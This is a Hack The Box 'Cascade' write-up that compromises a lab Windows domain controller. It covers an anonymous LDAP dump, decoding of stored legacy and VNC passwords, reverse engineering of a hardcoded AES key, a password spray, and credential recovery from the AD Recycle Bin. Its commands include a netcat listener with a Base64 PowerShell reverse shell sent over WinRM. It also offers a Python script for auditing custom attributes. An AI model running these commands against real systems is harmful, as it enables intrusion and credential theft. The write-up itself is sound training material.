HTB - Cascade

Target IP: 10.129.7.238
Domain: cascade.local
DC Hostname: CASC-DC1.cascade.local
OS: Windows Server 2008 R2 SP1 (Domain Controller)
Difficulty: Medium
Author: [g1nt0n1c]


1. Phase 1: Reconnaissance & Information Gathering

1.1 TCP Port Discovery

# Full port scan with version/script detection, verbose output, saved to all formats
nmap 10.129.7.238 -sV -sC -p- -v -oA nmap/cascade

Port Analysis & Attack Surface

Port       Service    Notes
----       -------    -----
53/tcp     DNS        Windows DNS — confirms this is a DC
88/tcp     Kerberos   Domain Controller confirmed
135/tcp    MS-RPC     Standard Windows RPC
139/tcp    NetBIOS    Legacy SMB name service
389/tcp    LDAP       High value — domain: cascade.local, queryable without auth
445/tcp    SMB        File shares, lateral movement
5985/tcp   WinRM      Remote shell if valid credentials found

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Microsoft DNS 6.1.7601 (Windows Server 2008 R2 SP1)
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local)
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0
Service Info: Host: CASC-DC1; OS: Windows Server 2008 R2 SP1

| smb2-security-mode:
|   2.1:
|_    Message signing enabled and required

Key observation: SMB signing is required — relay attacks are blocked. LDAP on 389 is the most interesting entry point.

1.2 Local Host Resolution

# Add both the FQDN and short domain name for full resolution
echo "10.129.7.238  CASC-DC1.cascade.local cascade.local" | sudo tee -a /etc/hosts

2. Phase 2: LDAP Enumeration & Credential Discovery

2.1 Validate LDAP Null Bind

Test whether the LDAP server allows unauthenticated queries (null bind). A [+] response means we can dump directory objects without credentials.

# Attempt anonymous LDAP bind
nxc ldap 10.129.7.238 -u '' -p ''
# [+] cascade.local\:

2.2 Dump All User Objects via LDAP

Query every user object and return all attributes. This reveals non-standard fields that administrators may have populated with sensitive data.

# Return all attributes (*) for every user object in the directory
nxc ldap 10.129.7.238 --query "(objectClass=user)" "*"

Key finding — r.thompson has a non-standard attribute:

[+] Response for object: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
cascadeLegacyPwd   clk0bjVldmE=

cascadeLegacyPwd is a custom AD attribute. The trailing = is a Base64 padding character.

2.3 Decode the Legacy Password

# Decode the Base64 string
echo "clk0bjVldmE=" | base64 -d
# rY4n5eva

2.4 Validate Credentials

# Confirm r.thompson's credentials work over SMB
nxc smb 10.129.7.238 -u r.thompson -p rY4n5eva
# [+] cascade.local\r.thompson:rY4n5eva

3. Phase 3: Initial Access (r.thompson → s.smith)

3.1 Enumerate SMB Shares

# List all shares and r.thompson's access level for each
nxc smb 10.129.7.238 -u r.thompson -p rY4n5eva --shares
Share        Permissions    Remark
-----        -----------    ------
ADMIN$                      Remote Admin
Audit$                      (no access)
Data         READ
NETLOGON     READ           Logon server share
print$       READ           Printer Drivers
SYSVOL       READ           Logon server share

3.2 Spider the Data Share

Recursively enumerate all readable files and save an index. This is faster than manually browsing large share trees.

# Spider all readable shares and output a JSON file map
nxc smb 10.129.7.238 -u r.thompson -p rY4n5eva -M spider_plus

3.3 Download All Files from Data Share

# Connect to the Data share, disable prompts, enable recursion, download everything
smbclient //10.129.7.238/Data -U r.thompson
prompt off
recurse on
mget *

Key finding: IT/Temp/s.smith/VNC Install.reg — a registry export containing an encrypted VNC password:

"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f

3.4 Decrypt the VNC Password

VNC (RealVNC / TightVNC) stores passwords encrypted with a fixed DES key. The key is public and the cipher is symmetric — a purpose-built tool can reverse it directly.

# Clone the VNC password decryptor
git clone https://github.com/jeroennijhof/vncpwd.git
cd vncpwd && make
 
# Convert the hex dump to raw bytes and save to a file
printf '\x6b\xcf\x2a\x4b\x6e\x5a\xca\x0f' > vnc.enc
 
# Decrypt the password
./vncpwd vnc.enc
# Password: sT333ve2

3.5 Validate s.smith Credentials

nxc smb 10.129.7.238 -u s.smith -p sT333ve2
# [+] cascade.local\s.smith:sT333ve2

3.6 Open Shell as s.smith

Generate a Base64 PowerShell reverse shell at revshells.com, then execute it via WinRM.

# Start listener
rlwrap nc -lvnp 5555
 
# Execute reverse shell payload via WinRM
nxc winrm 10.129.7.238 -u s.smith -p sT333ve2 -X "powershell -e JABjAGwAaQBlAG4Ad..."
# PS C:\Users\s.smith\Documents> whoami
# cascade\s.smith

4. Phase 4: Lateral Movement (s.smith → arksvc via Reverse Engineering)

4.1 Enumerate New Share Access

s.smith has READ on Audit$ — the share that r.thompson could not access.

nxc smb 10.129.7.238 -u s.smith -p sT333ve2 --shares
# Audit$    READ    <= NOW READABLE

4.2 Download Audit$ Contents

smbclient //10.129.7.238/Audit$ -U s.smith
prompt off
recurse on
mget *

Contents:

.
├── CascAudit.exe       ← .NET binary, candidate for reverse engineering
├── CascCrypto.dll      ← Custom crypto library used by the exe
├── DB/
│   └── Audit.db        ← SQLite database
├── RunAudit.bat        ← Reveals how the exe is invoked
├── System.Data.SQLite.dll
└── x64/x86/SQLite.Interop.dll

RunAudit.bat shows the invocation:

CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"

4.3 Reverse Engineer CascAudit.exe with dnSpy

CascAudit.exe is a .NET binary — dnSpy can decompile it back to near-original C# without any setup.

  1. Open dnSpy → File → Open → select CascAudit.exe
  2. In the assembly tree, navigate to the CascAudit namespace → Main() method
  3. Locate the decryption call:
    password = Crypto.DecryptString(text, "c4scadek3y654321");
    The AES key is hardcoded. text is the ciphertext pulled from Audit.db.
  4. Right-click the line → Add Breakpoint
  5. Click Start at the top — when prompted for arguments, provide the path to Audit.db (as seen in RunAudit.bat)
  6. Step through — the debugger reveals the decrypted password: w3lc0meFr31nd

4.4 Password Spray with Recovered Password

# Spray decrypted password against all known domain users
nxc smb 10.129.7.238 -u usernames.txt -p w3lc0meFr31nd
# [+] cascade.local\arksvc:w3lc0meFr31nd

4.5 Shell as arksvc

rlwrap nc -lvnp 5555
nxc winrm 10.129.7.238 -u arksvc -p w3lc0meFr31nd -X "powershell -e JABjAGwAaQ..."
# PS C:\Users\arksvc\Documents> whoami
# cascade\arksvc

5. Phase 5: Privilege Escalation (AD Recycle Bin → Administrator)

5.1 Identify Group Memberships

# Check local and domain group memberships for arksvc
net user arksvc
# Local Group Memberships: AD Recycle Bin

AD Recycle Bin is a privileged group that can read — and restore — deleted Active Directory objects, including all their attributes.

5.2 Recall the Intelligence from the Data Share

The file Data/IT/Email Archives/Meeting Notes.html (found during r.thompson’s share enumeration) contained:

“We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018. Username is TempAdmin (password is the same as the normal admin account password).”

If TempAdmin was deleted rather than permanently purged, its attributes — including cascadeLegacyPwd — should still exist in the Recycle Bin.

5.3 Find the Deleted Object

# List all soft-deleted AD objects (excludes the container itself)
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
# Name: TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
# ObjectClass: user

5.4 Recover All Attributes of TempAdmin

# Retrieve every attribute of the deleted TempAdmin object
Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *
# cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz   ← same custom field as r.thompson

5.5 Decode the Password

echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
# baCT3r1aN00dles

5.6 Validate Administrator Access

nxc smb 10.129.7.238 -u administrator -p baCT3r1aN00dles
# [+] cascade.local\administrator:baCT3r1aN00dles (Pwn3d!)

Deep Dive: LDAP Null Bind & Custom AD Attributes

Active Directory allows administrators to extend the schema with custom attributes. cascadeLegacyPwd is not a standard field — it was added by the Cascade administrators to store a legacy password during a migration. Because LDAP null bind was allowed, any unauthenticated user on the network could query it.

Why this matters: Custom AD attributes are rarely audited by security tools and are often overlooked in pen tests. Always dump the full attribute set (*) rather than a predefined list when enumerating user objects.
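As an added audit script (not part of this write-up), the following Python parses an attribute dump in either the nxc "attr   value" layout from Phase 2 or the Get-ADObject "attr : value" layout from the Recycle Bin step, and flags non-schema attributes whose Base64 values decode to readable text. The sample dump is constructed from the two objects seen in this write-up, and the baseline attribute list is an assumption.

```python
import base64
import re

# Constructed sample: one live object in nxc's "attr   value" layout and one
# deleted object in PowerShell's "attr : value" layout (values from the write-up).
SAMPLE_DUMP = """\
[+] Response for object: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
sAMAccountName     r.thompson
memberOf           CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
cascadeLegacyPwd   clk0bjVldmE=
[+] Response for object: CN=TempAdmin,CN=Deleted Objects,DC=cascade,DC=local
cascadeLegacyPwd   : YmFDVDNyMWFOMDBkbGVz
"""
# Attributes a stock user object carries (assumed); anything else is a schema extension.
BASELINE_ATTRS = {"samaccountname", "memberof", "description", "displayname",
                  "mail", "objectclass", "useraccountcontrol", "isdeleted"}

OBJECT_RE = re.compile(r"^\[\+\] Response for object: (.+)$")
ATTR_RE = re.compile(r"^(\S+)\s+(?::\s+)?(.*)$")  # accepts both layouts
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def parse_dump(text):
    """Turn the attribute-per-line dump into {dn: {attr: value}}."""
    objects, current = {}, None
    for line in text.splitlines():
        header = OBJECT_RE.match(line)
        if header:
            current = header.group(1)
            objects[current] = {}
        elif current and (pair := ATTR_RE.match(line)):
            objects[current][pair.group(1)] = pair.group(2).strip()
    return objects


def decode_if_text(value):
    """Return the Base64-decoded value when it is printable ASCII, else None."""
    if not B64_RE.match(value) or len(value) % 4:
        return None
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded and decoded.isprintable() else None


def find_suspicious_attributes(text):
    """List (dn, attr, decoded) for non-baseline attributes holding readable Base64."""
    return [(dn, attr, decoded)
            for dn, attrs in parse_dump(text).items()
            for attr, value in attrs.items()
            if attr.lower() not in BASELINE_ATTRS
            and (decoded := decode_if_text(value))]
```

Run it against a real `nxc ldap --query "(objectClass=user)" "*"` dump to get a short list of attributes to review and purge rather than reading every object by hand.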


Deep Dive: VNC Fixed-Key Encryption

TightVNC and older RealVNC versions encrypt stored passwords with DES using the fixed key \xe8\x4a\xd6\x60\xc4\x72\x1a\xe0. DES is a symmetric cipher and this key is publicly known, so the “encryption” provides no real security. Any password stored in a registry export (.reg) or ultravnc.ini can be trivially decrypted with the key.


Deep Dive: AD Recycle Bin Privilege Abuse

The AD Recycle Bin was introduced in Windows Server 2008 R2 to allow recovery of deleted objects. Unlike the older “tombstone” mechanism, the Recycle Bin preserves all object attributes for a configurable period (default: 180 days). Members of the AD Recycle Bin group can read these deleted objects via PowerShell’s Get-ADObject -includeDeletedObjects.

Attack path: If a privileged account (e.g., a temp admin with the same password as the real admin) was deleted instead of having its password rotated, its credentials survive in the Recycle Bin. This is a common finding in environments that clean up accounts by deleting rather than disabling + rotating.